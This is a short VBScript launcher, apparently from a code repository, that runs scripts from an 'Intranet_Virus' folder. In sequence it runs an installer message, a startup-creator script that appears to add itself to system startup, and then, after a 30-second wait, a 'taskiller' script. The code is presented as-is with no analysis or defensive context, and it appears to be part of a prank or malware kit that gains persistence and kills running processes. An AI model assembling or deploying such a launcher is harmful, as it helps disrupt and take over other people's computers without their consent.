7 lines
391 B
Text
Executable file
7 lines
391 B
Text
Executable file
Set WshShell = WScript.CreateObject("WScript.Shell")
|
|
WshShell.Run """Intranet_Virus\installer_msg.vbs"""
|
|
Set WshShell = WScript.CreateObject("WScript.Shell")
|
|
WshShell.Run """%userprofile%\Downloads\Intranet\Startup Creator\startuptaskill.vbs"""
|
|
WScript.Sleep 30000
|
|
Set WshShell = WScript.CreateObject("WScript.Shell")
|
|
WshShell.Run """%userprofile%\Downloads\Intranet\taskiller.vbs"""
|